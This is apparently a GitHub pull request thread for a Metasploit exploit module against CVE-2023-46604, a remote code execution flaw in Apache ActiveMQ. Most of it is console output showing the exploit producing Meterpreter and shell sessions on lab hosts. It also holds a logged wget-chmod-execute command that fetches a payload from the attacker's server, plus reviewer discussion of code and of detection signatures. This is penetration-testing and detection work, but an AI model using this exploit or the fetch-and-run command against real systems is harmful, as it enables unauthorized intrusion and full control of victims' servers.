Exploit module for CVE-2023-46604 - Apache ActiveMQ

[sfewer-r7]

This pull request is an exploit module for CVE-2023-46604, affecting the OpenWire transport unmarshaller in Apache ActiveMQ. This exploit is based of this original work by X1r0z (https://github.com/X1r0z/ActiveMQ-RCE).

Opening this pull request as a draft while I work on it, the following needs to be done.

• The session is not being automatically caught as expected, you have to manually interact with the new session
• Test a Linux target
• Add documentation

Example usage:

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options

Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[
                                       ,type:host:port][...]
   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.me
                                       tasploit.com/docs/using-metasploit/basi
                                       cs/using-metasploit.html
   RPORT    61616            yes       The target port (TCP)
   SRVHOST  192.168.86.42    yes       The local host or network interface to
                                       listen on. This must be an address on t
                                       he local machine or 0.0.0.0 to listen o
                                       n all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (defau
                                       lt is randomly generated)
   URIPATH                   no        The URI to use for this exploit (defaul
                                       t is random)


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   EXITFUNC           process          yes       Exit technique (Accepted: '',
                                                  seh, thread, process, none)
   FETCH_COMMAND      CERTUTIL         yes       Command to fetch payload (Acc
                                                 epted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE       false            yes       Attempt to delete the binary
                                                 after execution
   FETCH_FILENAME     HzZSYqDojV       no        Name to use on remote system
                                                 when storing payload; cannot
                                                 contain spaces.
   FETCH_SRVHOST                       no        Local IP to use for serving p
                                                 ayload
   FETCH_SRVPORT      8080             yes       Local port to use for serving
                                                  payload
   FETCH_URIPATH                       no        Local URI to use for serving
                                                 payload
   FETCH_WRITABLE_DI  %TEMP%           yes       Remote writable dir to store
   R                                             payload; cannot contain space
                                                 s.
   LHOST              eth0             yes       The listen address (an interf
                                                 ace may be specified)
   LPORT              4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
[*] 192.168.86.50:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.3
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > 
[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] 192.168.86.50:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.86.50:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.3
[*] 192.168.86.50:61616 - Using URL: http://192.168.86.42:8080/33Y94vb
[*] 192.168.86.50    apache_activemq_rce_cve_2023_46604 - 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 192.168.86.50    apache_activemq_rce_cve_2023_46604 - 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Sending stage (200774 bytes) to 192.168.86.50
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:51699) at 2023-11-01 17:32:06 +0000

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-V28QNSO2H05\Administrator
meterpreter > pwd
C:\apache-activemq-5.15.3\bin
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.86.50 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > 

[sfewer-r7]

This pull request is now ready for review. I added in a Windows/Linux and Unix (for OSX, although I don't have an OSX machine to test on) targets as ActiveMQ supports all these.

Windows

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] 192.168.86.50:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.86.50:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.3
[*] 192.168.86.50:61616 - Using URL: http://192.168.86.42:8080/4ORmILKzvCrowHQ
[*] 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Sending stage (200774 bytes) to 192.168.86.50
[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.50:51975) at 2023-11-02 10:15:14 +0000

meterpreter > getuid
Server username: WIN-V28QNSO2H05\Administrator
meterpreter > pwd
C:\apache-activemq-5.15.3\bin
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 

Linux

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] 192.168.86.43:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
[*] 192.168.86.43:61616 - Using URL: http://192.168.86.42:8080/Fn51CApi
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Sending stage (3045380 bytes) to 192.168.86.43
[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.43:44674) at 2023-11-02 10:17:42 +0000

meterpreter > getuid
Server username: steve
meterpreter > pwd
/home/steve/Downloads/apache-activemq-5.18.2/bin
meterpreter > sysinfo
Computer     : 192.168.86.43
OS           : Ubuntu 22.04 (Linux 6.2.0-33-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Unix

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] 192.168.86.43:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
[*] 192.168.86.43:61616 - Using URL: http://192.168.86.42:8080/3mzi3Tfryin
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.43:48962) at 2023-11-02 10:20:13 +0000
id
[*] 192.168.86.43:61616 - Server stopped.

uid=1000(steve) gid=1000(steve) groups=1000(steve),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),139(wireshark)
pwd
/home/steve/Downloads/apache-activemq-5.18.2/bin
uname -a
Linux sfewer-ubuntu-test 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep  7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
exit

[adfoster-r7]

Not a blocker

Suggested change

	res = sock.get_once
	begin
	res = sock.get_once
	ensure
	disconnect if sock
	end

[adfoster-r7]

Not a blocker - and definitely not required; a bunch of our other modules use bindata for binary parsing for readability purposes:

https://github.com/dmendel/bindata#what-is-bindata

[adfoster-r7]

Not a blocker for this PR; There might be an edgecase/bug in framework itself if this is required

[adfoster-r7]

Not a blocker; potentially a missing feature in framework itself

[bwatters-r7]

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options

Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   10.5.134.129     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas
                                       ploit.html
   RPORT    61616            yes       The target port (TCP)
   SRVHOST  10.5.135.201     yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      OgktwSulD        no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       10.5.135.201     no        Local IP to use for serving payload
   FETCH_SRVPORT       8000             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > run

[*] Command to run on remote host: wget -qO ./NEsjPiUoem http://10.5.135.201:8000/RByzlSnTzclKDpvXskXIrg; chmod +x ./NEsjPiUoem; ./NEsjPiUoem &
[*] Fetch Handler listening on 10.5.135.201:8000
[*] HTTP server started
[*] Adding resource /RByzlSnTzclKDpvXskXIrg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] 10.5.134.129:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 10.5.134.129:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
[*] 10.5.134.129:61616 - Using URL: http://10.5.135.201:8080/y86DDB6crs1tJ9I
[*] 10.5.134.129:61616 - Sleeping for 2 seconds before attempting again
[*] 10.5.134.129:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 10.5.134.129:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Client 10.5.134.129 requested /RByzlSnTzclKDpvXskXIrg
[*] Sending payload to 10.5.134.129 (Wget/1.21.2)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.129:52810) at 2023-11-02 11:37:10 -0500
[*] 10.5.134.129:61616 - Server stopped.

meterpreter > sysinfo
Computer     : 10.5.134.129
OS           : Ubuntu 22.04 (Linux 6.2.0-36-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > 

[jvoisin]

Suggested change

	if res =~ /ProviderVersion...(\d+\.\d+\.\d+)/
	if res !~ /ProviderVersion...(\d+\.\d+\.\d+)/
	CheckCode::Detected
	end

Something like this would allow to reduce the level of nested indentation in this function.

[sfewer-r7]

implemented something similar via ea21036 to reduce the nesting

[jvoisin]

Suggested change

	if request.uri == get_resource
	if request.uri != get_resource
	super
	end

Again here, to reduce nested indentation :)

[sfewer-r7]

reduce indentation as suggested in 4272678

[jvoisin]

This might be a stupid question, but could it be possible for the payload to contain the characters ]]>?

[sfewer-r7]

Good question, CDATA cannot cannot contain the sequence ]]>, this was not an issue when testing any payloads. I guess the safest thing to do would be to sanity check that payload.encoded does not include ]]>, and if it does, fail gracefully.

[sfewer-r7]

I added a check for this in fa8c400.

[HuskyHacks]

@sfewer-r7 quick question for you about this

Is there ever a case where we could get the server to load the remote XML file via HTTPS instead of HTTP?

I'm working on network signatures for this one and the XML in the body of the HTTP request would be a phenomenal signature... if we can always see it 😅

[sfewer-r7]

Hi @HuskyHacks , good question. For this specific Metasploit module I don't think it would work as setting the SSL option will make the both initial TCP connection to port 61616 try to use SSL as well as the HttpServer which is seperatly serving out the XML file. The reason for this is both these mixins will query the same option (SSL) to determine if they should establish SSL based connections. This is a quirk of using both the Msf::Exploit::Remote::Tcp and Msf::Exploit::Remote::HttpServer mixin in the same module (happy to be corrected here, cc @bwatters-r7 or @adfoster-r7).

That aside, if the XML file was served over HTTPS, the client (ActiveMQ) would need to accept a self signed cert from the attacker (unless attacker supplies a CA signed cert), so depending on if the clients network stack verifies certs, serving the XML file over HTTPS may or may not work. I have not tested this.

Sorry I cant give you a more concrete answer :)

[HuskyHacks]

@sfewer-r7 thank you! That helps a lot. I'm now testing to see if I can coerce that XML load to use HTTPS with the original POC.

Thanks!

[bwatters-r7]

I have no idea if there's something else in the stack of dependencies that would affect the SSL status, and this is based off of about 5 minutes of code spelunking, but Msf::Exploit::Remote::Tcp uses an advanced option for SSL:

metasploit-framework/lib/msf/core/exploit/remote/tcp.rb

Line 65 in 5b888c4

OptBool.new('SSL', [ false, 'Negotiate SSL/TLS for outgoing connections', false]),

Msf::Exploit::Remote::HttpServer uses a standard SSL option it inherits from TcpServer:

metasploit-framework/lib/msf/core/exploit/remote/tcp_server.rb

Line 21 in 5b888c4

OptBool.new('SSL', [ false, 'Negotiate SSL for incoming connections', false]),

So at least there, it should not conflict?
Edit..... ugh, they both go into the datastore under the same name..... so yeah, you're right.

[sfewer-r7]

Thanks Brendan, appreciate you investigating. I don't think this blocks this module, but it would be nice to have some way to "deregister" the TCP mixin from SSL in this specific instance, as the OpenWire protocol doesn't require it (AFAIK) and this would open up enabling SSL seperatly for the HttpServer.

[sfewer-r7]

Thanks for everyone's review/feedback. I have made all the edits I plan to unless there are any outstanding issues we want to address

[bwatters-r7]

Release Notes

This pull request is an exploit module for CVE-2023-46604, affecting the OpenWire transport unmarshaller in Apache ActiveMQ.

[HuskyHacks]

An interesting development here! Don't know if it's worth refactoring the current module but wanted to post here if anyone is interested in exploitation

https://vulncheck.com/blog/cve-2023-44604-activemq-in-memory

Turns out you don't need to shell out to execute code if you use the Nashorn engine to evaluate and execute code directly from within the process space of java.